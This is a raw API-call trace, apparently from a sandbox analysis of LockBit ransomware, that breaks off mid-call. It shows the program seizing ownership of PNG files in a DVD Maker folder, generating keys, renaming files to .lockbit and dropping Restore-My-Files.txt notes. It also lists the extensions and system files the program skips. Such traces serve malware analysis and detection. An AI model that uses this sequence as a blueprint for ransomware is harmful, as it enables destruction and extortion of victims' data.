[0092.892] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0092.892] RtlFreeAnsiString (AnsiString="\\") [0092.892] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x11a0) returned 0x0 [0092.892] malloc (_Size=0x200) returned 0x77d800 [0092.892] NtQueryInformationToken (in: TokenHandle=0x11a0, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0092.892] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0092.892] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0092.892] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\content-background.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0092.893] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\content-background.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0092.894] CloseHandle (hObject=0x11a0) returned 1 [0092.894] free (_Block=0x77d800) [0092.894] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\content-background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\content-background.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x11a0 [0092.894] CreateIoCompletionPort (FileHandle=0x11a0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0092.894] malloc (_Size=0x40068) returned 0x3d70048 [0092.897] GetFileSizeEx (in: hFile=0x11a0, lpFileSize=0x3d70060 | out: lpFileSize=0x3d70060*=293917) returned 1 [0092.897] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0092.899] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0092.900] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db007c) returned 0x0 [0092.900] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0092.902] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0092.903] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db008c) returned 0x0 [0092.903] ReadFile (in: hFile=0x11a0, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0092.908] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\content-background.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\content-background.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0092.908] malloc (_Size=0xba) returned 0x77d800 [0092.908] NtSetInformationFile (FileHandle=0x11a0, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xba, FileInformationClass=0xa) returned 0x0 [0092.909] free (_Block=0x77d800) [0092.909] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\content-background.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel") returned 1 [0092.909] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Restore-My-Files.txt") returned 72 [0092.909] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0092.909] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72701fd0, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x72701fd0, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x5540f3f9, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x11276, dwReserved0=0x0, dwReserved1=0x0, cFileName="header-background.png", cAlternateFileName="")) returned 1 [0092.909] lstrcmpiW (lpString1=".", lpString2="header-background.png") returned -1 [0092.909] lstrcmpiW (lpString1="..", lpString2="header-background.png") returned -1 [0092.910] PathFindExtensionW (pszPath="header-background.png") returned=".png" [0092.910] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0092.910] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0092.910] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0092.910] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0092.910] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0092.910] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0092.910] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0092.910] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0092.910] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0092.910] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0092.910] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0092.910] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0092.910] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0092.910] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0092.910] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0092.910] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0092.910] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0092.911] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0092.911] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0092.911] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0092.911] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0092.911] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0092.911] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0092.911] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0092.911] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0092.911] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0092.911] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0092.911] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0092.911] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0092.911] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0092.911] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0092.911] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0092.911] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0092.911] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0092.911] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0092.911] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0092.911] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0092.911] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0092.912] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0092.912] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0092.912] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0092.912] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0092.912] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0092.912] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0092.912] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0092.912] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0092.912] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0092.912] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="header-background.png") returned 1 [0092.912] lstrcmpiW (lpString1="ntldr", lpString2="header-background.png") returned 1 [0092.912] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="header-background.png") returned 1 [0092.912] lstrcmpiW (lpString1="bootsect.bak", lpString2="header-background.png") returned -1 [0092.912] lstrcmpiW (lpString1="autorun.inf", lpString2="header-background.png") returned -1 [0092.912] lstrcmpiW (lpString1="thumbs.db", lpString2="header-background.png") returned 1 [0092.912] lstrcmpiW (lpString1="iconcache.db", lpString2="header-background.png") returned 1 [0092.912] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\") returned="" [0092.912] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\header-background.png") returned=".png" [0092.912] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0092.912] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0092.913] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0092.913] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0092.913] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0092.913] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0092.913] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0092.913] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0092.913] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0092.913] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0092.913] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0092.913] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0092.913] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0092.913] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0092.913] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0092.913] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0092.913] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0092.913] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0092.913] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0092.913] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0092.913] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0092.913] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0092.913] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0092.913] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0092.914] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0092.914] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0092.914] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0092.914] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0092.914] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\header-background.png.lockbit") returned 81 [0092.914] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\header-background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\header-background.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0092.916] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0092.918] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0092.918] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0092.920] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0092.922] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0092.922] RtlFreeAnsiString (AnsiString="\\") [0092.922] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x13dc) returned 0x0 [0092.922] malloc (_Size=0x200) returned 0x77d800 [0092.922] NtQueryInformationToken (in: TokenHandle=0x13dc, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0092.922] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0092.922] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0092.922] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\header-background.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0092.923] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\header-background.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0092.923] CloseHandle (hObject=0x13dc) returned 1 [0092.924] free (_Block=0x77d800) [0092.924] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\header-background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\header-background.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13dc [0092.924] CreateIoCompletionPort (FileHandle=0x13dc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0092.924] malloc (_Size=0x40068) returned 0x1ff1e60 [0092.924] GetFileSizeEx (in: hFile=0x13dc, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=70262) returned 1 [0092.924] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0092.927] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0092.928] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0092.928] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0092.931] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0092.931] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0092.932] ReadFile (in: hFile=0x13dc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0093.010] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\header-background.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\header-background.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0093.010] malloc (_Size=0xb8) returned 0x77d800 [0093.010] NtSetInformationFile (FileHandle=0x13dc, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xb8, FileInformationClass=0xa) returned 0x0 [0093.013] free (_Block=0x77d800) [0093.013] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\header-background.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel") returned 1 [0093.013] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Restore-My-Files.txt") returned 72 [0093.013] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0093.014] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72701fd0, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x72701fd0, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x55435557, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x3126b, dwReserved0=0x0, dwReserved1=0x0, cFileName="passport.png", cAlternateFileName="")) returned 1 [0093.014] lstrcmpiW (lpString1=".", lpString2="passport.png") returned -1 [0093.014] lstrcmpiW (lpString1="..", lpString2="passport.png") returned -1 [0093.014] PathFindExtensionW (pszPath="passport.png") returned=".png" [0093.014] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0093.014] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0093.014] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0093.014] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0093.014] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0093.014] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0093.014] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0093.014] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0093.014] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0093.014] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0093.014] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0093.014] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0093.014] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0093.014] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0093.014] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0093.014] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0093.014] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0093.014] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0093.014] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0093.015] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0093.015] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0093.015] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0093.015] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0093.015] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0093.015] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0093.015] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0093.015] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0093.015] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0093.015] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0093.015] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0093.015] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0093.015] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0093.015] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0093.015] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0093.015] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0093.015] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0093.015] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0093.015] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0093.015] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0093.015] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0093.015] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0093.015] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0093.015] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0093.016] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0093.016] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0093.016] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0093.016] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0093.016] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="passport.png") returned 1 [0093.016] lstrcmpiW (lpString1="ntldr", lpString2="passport.png") returned -1 [0093.016] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="passport.png") returned -1 [0093.016] lstrcmpiW (lpString1="bootsect.bak", lpString2="passport.png") returned -1 [0093.016] lstrcmpiW (lpString1="autorun.inf", lpString2="passport.png") returned -1 [0093.016] lstrcmpiW (lpString1="thumbs.db", lpString2="passport.png") returned 1 [0093.016] lstrcmpiW (lpString1="iconcache.db", lpString2="passport.png") returned -1 [0093.016] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\") returned="" [0093.016] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passport.png") returned=".png" [0093.016] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0093.016] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0093.016] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0093.016] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0093.016] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0093.016] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0093.016] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0093.016] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0093.016] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0093.016] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0093.017] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0093.017] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0093.017] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0093.017] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0093.017] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0093.017] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0093.017] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0093.017] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0093.017] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0093.017] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0093.017] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0093.017] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0093.017] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0093.017] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0093.017] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0093.017] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0093.017] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0093.017] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0093.017] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passport.png.lockbit") returned 72 [0093.017] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passport.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\passport.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0093.020] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0093.022] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0093.022] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0093.023] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0093.024] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0093.025] RtlFreeAnsiString (AnsiString="\\") [0093.025] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x13dc) returned 0x0 [0093.025] malloc (_Size=0x200) returned 0x77d800 [0093.025] NtQueryInformationToken (in: TokenHandle=0x13dc, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0093.025] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0093.025] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0093.025] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passport.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0093.026] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passport.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0093.026] CloseHandle (hObject=0x13dc) returned 1 [0093.026] free (_Block=0x77d800) [0093.026] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passport.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\passport.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13dc [0093.027] CreateIoCompletionPort (FileHandle=0x13dc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0093.027] malloc (_Size=0x40068) returned 0x1ff1e60 [0093.027] GetFileSizeEx (in: hFile=0x13dc, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=201323) returned 1 [0093.027] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0093.030] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0093.030] BCryptGenRandom (in: 